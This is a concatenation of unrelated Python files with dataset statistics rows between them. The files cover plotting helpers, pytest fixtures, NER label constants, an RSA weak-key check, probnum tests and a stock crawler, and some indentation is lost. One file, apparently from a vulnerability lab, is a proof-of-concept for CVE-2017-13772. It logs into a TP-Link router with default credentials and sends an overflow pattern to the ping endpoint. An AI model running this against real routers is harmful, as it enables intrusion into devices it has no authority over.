            data_pie = [new_dict[o] if o in new_dict else 0 for o in t_type]
            label = ['class %s:\n' % tt + str(dd) if dd != 0 else '' for dd, tt in zip(data_pie, t_type)]
axes[sign // len(type_data2), sign % len(type_data2)].pie(data_pie,
labels=label,
radius=trans_size_dict['%s_%s' % (str(a), str(b))],
labeldistance=.2)
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xlabel(b)
if sign % len(type_data2) == 0:
axes[sign // len(type_data2), sign % len(type_data2)].set_ylabel(a)
sign += 1
fig.suptitle(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_one_type_type_box(data1, data2, data3, title, fig_name, labelx, labely, name):
"""
data1是连续特征的值的列表,data2是类别型特征的值的列表。 data3是类别型特征。绘制组合特征值组合的分类箱图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param labelx: X轴标题
:param labely: Y轴标题
:param name: 图例的名称
:return: 饼图
"""
df = pd.DataFrame()
df['number'] = data1
df['type'] = data2
df['target'] = data3
plt.figure(figsize=(13, 10), dpi=80)
sns.boxplot(x='type', y='number', data=df, hue='target')
    # separators between the type groups; span the actual data range rather
    # than hard-coded y bounds
    for i in range(len(df['type'].unique()) - 1):
        plt.vlines(i + .5, df['number'].min(), df['number'].max(),
                   linestyles='solid', colors='gray', alpha=0.2)
    plt.title(u'%s' % title, fontsize=22)
    plt.xlabel(u'%s' % labelx)
    plt.ylabel(u'%s' % labely)
plt.legend(title=name)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_scatter_type(data1, data2, data3, title, fig_name, label1, label2):
"""
绘制data1和data2的散点图,其中data3中的值为图例。如果类别大于10个类别,需要在程序中添加颜色。否则会导致不同类颜色相同
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 代表图例的数据列表
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param label1: X轴标题
:param label2: Y轴标题
:return: 散点图
"""
fig, ax = plt.subplots()
legend_list = list(set(data3))
    # list of 11 distinct colors
    c_list = ['k', 'g', 'c', 'b', 'y', 'r', 'm', 'tab:brown', 'tab:blue', 'tab:gray', 'tab:pink']
    for j in range(len(legend_list)):
        data_1 = [a for a, b in zip(data1, data3) if b == legend_list[j]]
        data_2 = [c for c, d in zip(data2, data3) if d == legend_list[j]]
        # label each series with its own class; cycle through the color list
        ax.scatter(data_1, data_2, c=c_list[j % len(c_list)], label=legend_list[j],
                   alpha=0.9, edgecolors='none', s=50)
ax.legend()
plt.title(u'%s' % title)
plt.xlabel(u'%s' % label1)
plt.ylabel(u'%s' % label2)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_scatter_3d(data1, data2, data3, title, fig_name, label1, label2, label3):
"""
绘制3d的散点图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:param label1: X轴标题
:param label2: Y轴标题
:param label3: Z轴标题
:return: 散点图
"""
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(data1, data2, data3)
ax.set_xlabel(u'%s' % label1)
ax.set_ylabel(u'%s' % label2)
ax.set_zlabel(u'%s' % label3)
plt.title(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
def plot_two_type_num_box(data1, data2, data3, title, fig_name):
"""
data1,data2均是类别型特征的值的列表。 data3是连续型特征,特征值的组合采用箱图
:param data1: 数据列表1
:param data2: 数据列表2
:param data3: 数据列表3
:param title: 图片的标题
:param fig_name: 保存的图片名称
:return: 饼图
"""
plt.style.use('ggplot')
    # distinct values of the two categorical features
type_data1 = sorted(list(set(data1)))
type_data2 = sorted(list(set(data2)))
    # the feature with fewer distinct values becomes the rows
if len(type_data1) > len(type_data2):
type_data1, type_data2 = type_data2, type_data1
data1, data2 = data2, data1
    # set up the subplot grid
fig, axes = plt.subplots(nrows=len(type_data1), ncols=len(type_data2))
if len(data1) == 0 or len(data2) == 0 or len(data3) == 0:
return print('绘图数据出现空列表')
min_num, max_num = min(data3), max(data3)
sign = 0
for a in type_data1:
for b in type_data2:
pie_data = []
for c, d, e in zip(data1, data2, data3):
if a == c and b == d:
pie_data.append(e)
if len(type_data1) == 1:
if len(type_data2) != 1:
axes[sign % len(type_data2)].boxplot(pie_data, showmeans=True, labels=[''])
                # use the same y-axis range in every cell
axes[sign % len(type_data2)].set_ylim(min_num, max_num)
                # bottom row: label the column
axes[sign % len(type_data2)].set_xlabel(b)
                # first column: label the row
if sign % len(type_data2) == 0:
axes[sign % len(type_data2)].set_ylabel(a)
else:
axes[sign % len(type_data2)].set_yticks(())
else:
axes.boxplot(pie_data, showmeans=True, labels=[''])
                # use the same y-axis range in every cell
axes.set_ylim(min_num, max_num)
                # single cell: label both axes
axes.set_xlabel(b)
axes.set_ylabel(a)
else:
axes[sign // len(type_data2), sign % len(type_data2)].boxplot(pie_data, showmeans=True, labels=[''])
                # use the same y-axis range in every cell
axes[sign // len(type_data2), sign % len(type_data2)].set_ylim(min_num, max_num)
                # bottom row: label the column
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xlabel(b)
                # first column: label the row
if sign % len(type_data2) == 0:
axes[sign // len(type_data2), sign % len(type_data2)].set_ylabel(a)
                # first column but not the bottom row: keep only the y axis
if sign // len(type_data2) != len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_xticks(())
else:
                    # not the first column: keep only the x axis on the bottom row
if sign // len(type_data2) == len(type_data1) - 1:
axes[sign // len(type_data2), sign % len(type_data2)].set_yticks(())
else:
axes[sign // len(type_data2), sign % len(type_data2)].set_yticks(())
axes[sign // len(type_data2), sign % len(type_data2)].set_xticks(())
sign += 1
fig.suptitle(u'%s' % title)
plt.savefig(r'%s\%s.png' % (drc.SAVE_PATH, fig_name))
plt.close()
| 32.410101 | 126 | 0.546407 | 2,194 | 16,043 | 3.829079 | 0.165907 | 0.052494 | 0.055708 | 0.064754 | 0.475301 | 0.444233 | 0.42614 | 0.401619 | 0.343054 | 0.325914 | 0 | 0.030628 | 0.314156 | 16,043 | 494 | 127 | 32.475709 | 0.732891 | 0.16462 | 0 | 0.324723 | 0 | 0 | 0.033637 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055351 | false | 0 | 0.03321 | 0 | 0.110701 | 0.00369 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad9c98ba1ccef3f213cfd946fa70d293d40539b0 | 482 | py | Python | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | null | null | null | tests/conftest.py | revenants-cie/terraform-github-revdb-repository-manager | 237d94e58ae638345d43c1e78aa1fd1232521b97 | [
"Apache-2.0"
] | 1 | 2022-02-22T01:11:14.000Z | 2022-02-22T01:11:14.000Z | import boto3
import pytest
from terraform_ci import setup_environment
TEST_ACCOUNT = "114198773012"
REGION = "us-east-2"
# setup terraform environment
setup_environment()
assert boto3.client("sts").get_caller_identity().get("Account") == TEST_ACCOUNT
@pytest.fixture(scope="session")
def asg_client():
asg = boto3.client("autoscaling", region_name=REGION)
return asg
@pytest.fixture()
def ec2_client():
ec2 = boto3.client("ec2", region_name=REGION)
return ec2
| 20.956522 | 79 | 0.746888 | 63 | 482 | 5.539683 | 0.47619 | 0.094556 | 0.091691 | 0.126075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050119 | 0.130705 | 482 | 22 | 80 | 21.909091 | 0.782816 | 0.056017 | 0 | 0 | 0 | 0 | 0.11479 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.133333 | false | 0 | 0.2 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ada2409612db55188edf6ecbf3b81c60ff68e026 | 1,817 | py | Python | JointBioER/DDI/src/constants.py | lingluodlut/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 6 | 2019-01-21T17:08:23.000Z | 2020-12-03T06:30:40.000Z | JointBioER/DDI/src/constants.py | duterscmy/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 1 | 2020-06-02T06:45:21.000Z | 2020-07-30T19:08:35.000Z | JointBioER/DDI/src/constants.py | duterscmy/JointBioER | e99ce9346624e7f3d48bdab726d79c7c65a286fb | [
"Apache-2.0"
] | 4 | 2019-04-09T13:17:19.000Z | 2021-07-21T10:57:26.000Z | # -*- coding: utf-8 -*-
"""
Created on Wed Dec 20 10:56:05 2017
@author: cmy
"""
# hyperparameters
# bils = 250  # number of units in the bidirectional LSTM
# ls = 100  # number of units in the unidirectional LSTM
wv = 100  # word-embedding dimension
label_mode = 'BIOES'  # tagging scheme
if_repeat = 'Y'  # whether an entity may take part in several relations
len_sentence = 117  # maximum sentence length, i.e. tokens per sample (at most 117)
len_word = 25
rl2i = {'ME': 0, 'AD': 1, 'EF': 2, 'IN': 3}  # relation label -> index
el2i = {'drug': 0, 'group': 1, 'brand': 2, 'drug_n': 3}  # entity label -> index
label = ['B','I','E','S']
entit = ['drug','group','brand','drug_n']
relat = ['EF','AD','ME','IN','MU']
dirct = ['1','2','M']
label2index = {}
index2label = {}
B_label = []
I_label = []
E_label = []
S_label = []
O_label = []
nowindex = 0
label2index['O'] = nowindex
nowindex += 1
for l in label:
for e in entit:
label2index[l+'-'+e] = nowindex
if l == 'B':
B_label.append(nowindex)
elif l == 'I':
I_label.append(nowindex)
elif l == 'E':
E_label.append(nowindex)
elif l == 'S':
S_label.append(nowindex)
nowindex += 1
for l in label:
for e in entit:
for r in relat:
for d in dirct:
label2index[l+'-'+e+'-'+r+'-'+d] = nowindex
if l == 'B':
B_label.append(nowindex)
elif l == 'I':
I_label.append(nowindex)
elif l == 'E':
E_label.append(nowindex)
elif l == 'S':
S_label.append(nowindex)
nowindex +=1
for each in label2index:
index2label[label2index[each]] = each
i2l_dic = index2label
l2i_dic = label2index
num_class = len(l2i_dic)  # total number of label classes for the multi-class task
relationmap = {'ME':['ME','MU'],'AD':['AD','MU'],'EF':['EF','MU'],'IN':['IN','MU'],'MU':['ME','AD','EF','IN','MU']}
dirmap = {'1':['2','M'],'2':['1','M'],'M':['1','2','M']}
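# Illustration (added for clarity; hypothetical usage, not part of the
# original module): the mappings built above encode and decode BIOES tags.
if __name__ == '__main__':
    print(l2i_dic['O'])                       # 0: the outside tag
    print(l2i_dic['B-drug'])                  # 1: the first plain B tag
    print(i2l_dic[l2i_dic['S-group-EF-M']])   # round trip -> 'S-group-EF-M'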
| 25.236111 | 115 | 0.508531 | 246 | 1,817 | 3.662602 | 0.337398 | 0.097669 | 0.168701 | 0.153163 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0.335183 | 0 | 0.049847 | 0.282334 | 1,817 | 71 | 116 | 25.591549 | 0.641104 | 0.109521 | 0 | 0.425926 | 0 | 0 | 0.081454 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ada2787156ba695d0fbb85897946a88cbd2d7dbb | 2,577 | py | Python | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | TP-Link/CVE-2017-13772/firmadyne-emu/tools/debug.py | CrackerCat/IoT-vulhub | cf0b7d4b5f203a4d7b0964e1a532bdba1ca67073 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 _*-
import urllib
import base64
import hashlib
import requests
import socks, socket
socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9999)
socket.socket = socks.socksocket
session = requests.Session()
session.verify = False
def login(ip, user, pwd):
hash = hashlib.md5()
hash.update(pwd)
auth_string = "%s:%s" % (user, hash.hexdigest())
encoded_string = base64.b64encode(auth_string)
encoded_string = urllib.quote(" " + encoded_string)
print(encoded_string)
headers={"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": "http://192.168.0.1/",
"Cookie": "Authorization=Basic%s" % encoded_string,
"Upgrade-Insecure-Requests": "1"}
params = {"Save": "Save"}
url = "http://" + ip + "/userRpm/LoginRpm.htm"
resp = session.get(url, params=params, headers=headers, timeout=10)
url = "http://%s/%s/userRpm" % (ip, (resp.text).split("=")[2].split("/")[3])
cookie = "Authorization=Basic%s" % encoded_string
return url, cookie
def exploit(url, auth):
test = "AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AA" \
"KAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"#200
params = {'ping_addr': test,
'doType':'ping',
'isNew':'new',
'sendNum':'20',
'pSize':'64',
'overTime':'800',
'trHops':'20'}
headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": "%s" % url,
"Cookie": auth,
"Upgrade-Insecure-Requests": "1"}
resp = session.get(url, params=params, headers=headers)
print(resp.text)
url, auth = login("192.168.2.2", "admin", "admin")
print(url + "/PingIframeRpm.htm")
print(auth)
exploit(url + "/PingIframeRpm.htm", auth)
| 41.564516 | 127 | 0.609624 | 332 | 2,577 | 4.683735 | 0.36747 | 0.018006 | 0.007717 | 0.029582 | 0.4 | 0.4 | 0.351125 | 0.351125 | 0.29582 | 0.29582 | 0 | 0.066144 | 0.207994 | 2,577 | 61 | 128 | 42.245902 | 0.695737 | 0.008925 | 0 | 0.222222 | 0 | 0.111111 | 0.430811 | 0.22697 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.092593 | 0 | 0.148148 | 0.074074 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8db1a1d70cf59d0ac902523c7f2f11e2ec62173 | 748 | py | Python | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | 1 | 2020-12-26T23:59:42.000Z | 2020-12-26T23:59:42.000Z | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | null | null | null | test/core/test_docs.py | andrjas/data_check | 12ba740fcf54261bed15f909290649e8350474da | [
"MIT"
] | null | null | null | from pathlib import Path
import re
def all_click_options():
main_py = Path(__file__).parent.parent.parent / "data_check" / "__main__.py"
assert main_py.exists()
options = re.findall(r'"--?[^"\s]+"', main_py.read_text())
return [o.rstrip('"').lstrip('"') for o in options]
def test_all_options_are_documented():
all_options = all_click_options()
print(all_options)
usage_md = Path(__file__).parent.parent.parent / "docs" / "usage.md"
assert usage_md.exists()
usage_txt = usage_md.read_text()
join = []
for opt in all_options:
if re.search(r"\* \`data_check\s+[^\`]*" + opt + "[\`\s\/]", usage_txt):
join.append(opt)
assert set(join) == set(all_options)
| 29.92 | 80 | 0.643048 | 107 | 748 | 4.149533 | 0.411215 | 0.112613 | 0.067568 | 0.09009 | 0.117117 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.18984 | 748 | 24 | 81 | 31.166667 | 0.732673 | 0 | 0 | 0 | 0 | 0 | 0.105615 | 0.028075 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.105263 | false | 0 | 0.157895 | 0 | 0.315789 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8de2b2cdb9084b06d486d87d93409815d89620b | 703 | py | Python | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 9 | 2022-01-14T03:32:34.000Z | 2022-03-22T13:47:45.000Z | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | null | null | null | badkeys/rsakeys/sharedprimes.py | badkeys/badkeys | c8cbc244f645cfcc54244fa4ea7722cd3f39ce22 | [
"MIT"
] | 1 | 2022-03-14T11:36:15.000Z | 2022-03-14T11:36:15.000Z | import gmpy2
from importlib.resources import open_binary
_moduli = {}
_supported_bits = [512, 768, 1024, 2048, 4096]
def sharedprimes(n, e=0):
global _moduli
bits = n.bit_length()
if bits not in _supported_bits:
return False
if bits not in _moduli:
with open_binary("badkeys.keydata", f"primes{bits}.dat") as f:
_moduli[bits] = gmpy2.from_binary(f.read())
breakme = gmpy2.gcd(n, _moduli[bits])
if breakme == 1:
return False
if gmpy2.is_prime(breakme):
p = breakme
q = n // p
if n == (p * q):
return {"detected": True, "p": int(p), "q": int(q)}
# Factoring failed
return {"detected": True}
| 24.241379 | 70 | 0.59175 | 97 | 703 | 4.14433 | 0.494845 | 0.074627 | 0.044776 | 0.054726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.047431 | 0.280228 | 703 | 28 | 71 | 25.107143 | 0.747036 | 0.02276 | 0 | 0.095238 | 0 | 0 | 0.071533 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.047619 | false | 0 | 0.095238 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8e475279de618536216a199ba6321c9d5e431ed | 2,251 | py | Python | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 226 | 2019-11-01T09:44:09.000Z | 2022-03-30T23:17:17.000Z | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 590 | 2019-11-21T08:32:30.000Z | 2022-03-31T12:37:37.000Z | tests/test_randprocs/test_markov/test_continuous/test_lti_sde.py | fxbriol/probnum | 7e0e94cf9146aaa2b730b02c6d75a022cd629b5c | [
"MIT"
] | 39 | 2020-01-13T16:29:45.000Z | 2022-03-28T16:16:54.000Z | import numpy as np
import pytest
from probnum import randprocs, randvars
from tests.test_randprocs.test_markov.test_continuous import test_linear_sde
class TestLTISDE(test_linear_sde.TestLinearSDE):
# Replacement for an __init__ in the pytest language. See:
# https://stackoverflow.com/questions/21430900/py-test-skips-test-class-if-constructor-is-defined
@pytest.fixture(autouse=True)
def _setup(
self,
test_ndim,
spdmat1,
spdmat2,
forw_impl_string_linear_gauss,
backw_impl_string_linear_gauss,
):
self.G_const = spdmat1
self.v_const = np.arange(test_ndim)
self.L_const = spdmat2
self.transition = randprocs.markov.continuous.LTISDE(
drift_matrix=self.G_const,
force_vector=self.v_const,
dispersion_matrix=self.L_const,
forward_implementation=forw_impl_string_linear_gauss,
backward_implementation=backw_impl_string_linear_gauss,
)
self.G = lambda t: self.G_const
self.v = lambda t: self.v_const
self.L = lambda t: self.L_const
self.g = lambda t, x: self.G(t) @ x + self.v(t)
self.dg = lambda t, x: self.G(t)
self.l = lambda t, x: self.L(t)
def test_discretise(self):
out = self.transition.discretise(dt=0.1)
assert isinstance(out, randprocs.markov.discrete.LTIGaussian)
def test_backward_rv(self, some_normal_rv1, some_normal_rv2):
out, _ = self.transition.backward_rv(
some_normal_rv1, some_normal_rv2, t=0.0, dt=0.1
)
assert isinstance(out, randvars.Normal)
def test_backward_realization(self, some_normal_rv1, some_normal_rv2):
out, _ = self.transition.backward_realization(
some_normal_rv1.mean, some_normal_rv2, t=0.0, dt=0.1
)
assert isinstance(out, randvars.Normal)
def test_drift_matrix(self):
np.testing.assert_allclose(self.transition.drift_matrix, self.G_const)
def test_force_vector(self):
np.testing.assert_allclose(self.transition.force_vector, self.v_const)
def test_dispersion_matrix(self):
np.testing.assert_allclose(self.transition.dispersion_matrix, self.L_const)
| 34.106061 | 101 | 0.682808 | 305 | 2,251 | 4.763934 | 0.288525 | 0.027529 | 0.044047 | 0.057811 | 0.465933 | 0.337922 | 0.293875 | 0.222987 | 0.158293 | 0.158293 | 0 | 0.017251 | 0.227454 | 2,251 | 65 | 102 | 34.630769 | 0.818286 | 0.067526 | 0 | 0.040816 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 1 | 0.142857 | false | 0 | 0.081633 | 0 | 0.244898 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a8eb2eaba91c179bf94310585ce07cc083077083 | 8,523 | py | Python | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | stock_db_monitoring.py | devsunset/stock | b963c8fd1126ec5af6cd6b35af8ab20dd7dffbe5 | [
"Apache-2.0"
] | null | null | null | ##################################################
#
# stock_db_monitoring program (for stock table version v3 and later)
#
##################################################
##################################################
# import
import sqlite3
import unicodedata
import requests
import bs4
from apscheduler.schedulers.blocking import BlockingScheduler
import stock_constant
##################################################
# constant
# current version of the monitoring tables
table_version = 9
# run interval of the program, in seconds
interval_seconds = 30
headers = {"User-Agent": stock_constant.USER_AGENT}
##################################################
# function
# stock current amt crawling
def getStocCurrentAmt(code):
    if stock_constant.PROXY_USE_FLAG:
        resp = requests.get(stock_constant.BASE_URL + stock_constant.CRAWLING_ITEM_URL + code,
                            proxies=stock_constant.PROXY_DICT, headers=headers)
    else:
        resp = requests.get(stock_constant.BASE_URL + stock_constant.CRAWLING_ITEM_URL + code,
                            headers=headers)
    html = resp.text
    bs = bs4.BeautifulSoup(html, 'html.parser')
    # fall back to the "no_down" element; calling .find() on the None returned
    # by a failed lookup would raise AttributeError, so pick the <em> first
    em = bs.find("em", {"class": "no_up"}) or bs.find("em", {"class": "no_down"})
    amt = em.find("span", {"class": "blind"}).get_text()
    return int(amt.replace(",", ""))
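# Example (illustrative; the stock code below is hypothetical): a price
# rendered as "12,345" in the page markup comes back as the integer 12345,
# e.g. getStocCurrentAmt('005930') -> 12345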
# fill space
def fill_str_space(input_s="", max_size=10, fill_char=" "):
l = 0
for c in input_s:
if unicodedata.east_asian_width(c) in ['F', 'W']:
l+=2
else:
l+=1
return input_s+fill_char*(max_size-l)
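# Example (illustrative): CJK characters count as display width 2, so both
# strings below end up padded to the same on-screen width of 10:
#   fill_str_space('분류', 10)  -> '분류' + 6 spaces (2 chars x width 2 = 4)
#   fill_str_space('abcd', 10) -> 'abcd' + 6 spaces (4 chars x width 1 = 4)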
# db table search
def searchList(sqlText):
columns = []
result = []
conn = sqlite3.connect("stock.db")
with conn:
cur = conn.cursor()
cur.execute(sqlText)
columns = list(map(lambda x: x[0], cur.description))
result = cur.fetchall()
return columns,result
# db table insert/update/delete
def executeDB(sqlText,sqlParam=None):
conn = sqlite3.connect("stock.db")
cur = conn.cursor()
sql = sqlText
if sqlParam == None:
cur.execute(sql)
else:
cur.execute(sql, sqlParam)
conn.commit()
conn.close()
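# Example (illustrative; the table name and values are hypothetical): pass
# values via sqlParam so sqlite3 performs the quoting instead of string
# formatting:
#   executeDB('UPDATE stock_v9_1 SET status = ? WHERE code = ?', ('S', '005930'))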
# set stock force sell
def setAllStockSell():
for idx, data in enumerate(CRAWLING_TARGET_FROM_MODULE):
print('---------- table : ',data['idx'],' : ',data['title'],'----------')
table_stock = 'stock_v'+str(table_version)+'_'+str(data['idx'])
sqlText = 'update '+table_stock+' set status = "S" where status = "I"'
executeDB(sqlText)
print('--- force stock all sell ---')
# get current all data
def getLastCurrentAllData():
for idx, data in enumerate(CRAWLING_TARGET_FROM_MODULE):
print('---------- table : ',data['idx'],' : ',data['title'],'----------')
try:
            table_stock = 'stock_v' + str(table_version) + '_' + str(data['idx'])
            table_stock_meta = 'stock_v' + str(table_version) + '_' + str(data['idx']) + '_meta'
            print(searchList("select * from " + table_stock_meta))
            print(searchList("select * from " + table_stock + " where status IN ('I','C','S') order by chg_dttm desc limit 1"))
except Exception as err:
print(err)
# get current amt
def getCurrentAmtData():
stockDataList = []
for idx, dataTarget in enumerate(CRAWLING_TARGET_FROM_MODULE):
# print('---------- table : ',data['idx'],' : ',data['title'],'----------')
try:
table_stock_meta = 'stock_v'+str(table_version)+'_'+str(dataTarget['idx'])+'_meta'
table_stock = 'stock_v'+str(table_version)+'_'+str(dataTarget['idx'])
sqlText = '''select b.status
, b.code
, b.item
, a.current_amt
, b.purchase_amt
, b.sell_amt
, (case b.status
when 'I' then a.current_amt+b.purchase_amt
when 'S' then a.current_amt+b.purchase_amt
else a.current_amt end ) as current_money
, b.purchase_count
from '''+table_stock_meta+''' a
inner join '''+table_stock+''' b
where b.status in ('I','C','S')
order by chg_dttm desc limit 1'''
col, data = searchList(sqlText)
# print(data)
if len(data) == 0:
sqlText = 'select current_amt from '+table_stock_meta
col_sub, data_sub = searchList(sqlText)
# print(data_sub)
stockDataList.append((dataTarget['title'],'매수대기','NONE','NONE',int(data_sub[0][0]),int(data_sub[0][0])))
else:
status = ""
if data[0][0] == "I":
status = "진행중"
                    # current value minus commission and tax
now_amt = getStocCurrentAmt(data[0][1])*int(data[0][7])
commission_amt = ((int(data[0][4])*stock_constant.STOCK_COMMISSION_RATE)/100) + (now_amt * stock_constant.STOCK_COMMISSION_RATE) / 100
tax_amt = (now_amt * stock_constant.STOCK_TAX_RATE) / 100
sell_amt = int(now_amt - commission_amt - tax_amt)
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][3])+sell_amt))
elif data[0][0] == "S":
status = "매도대기"
                    # current value minus commission and tax
now_amt = getStocCurrentAmt(data[0][1])*int(data[0][7])
commission_amt = ((int(data[0][4])*stock_constant.STOCK_COMMISSION_RATE)/100) + (now_amt * stock_constant.STOCK_COMMISSION_RATE) / 100
tax_amt = (now_amt * stock_constant.STOCK_TAX_RATE) / 100
sell_amt = int(now_amt - commission_amt - tax_amt)
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][3])+sell_amt))
else:
status = "매도완료"
stockDataList.append((dataTarget['title'],status,data[0][1],data[0][2],int(data[0][6]),int(data[0][6])))
except Exception as err:
print(err)
stockDataList.sort(key = lambda element : element[5],reverse=True)
print('--------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
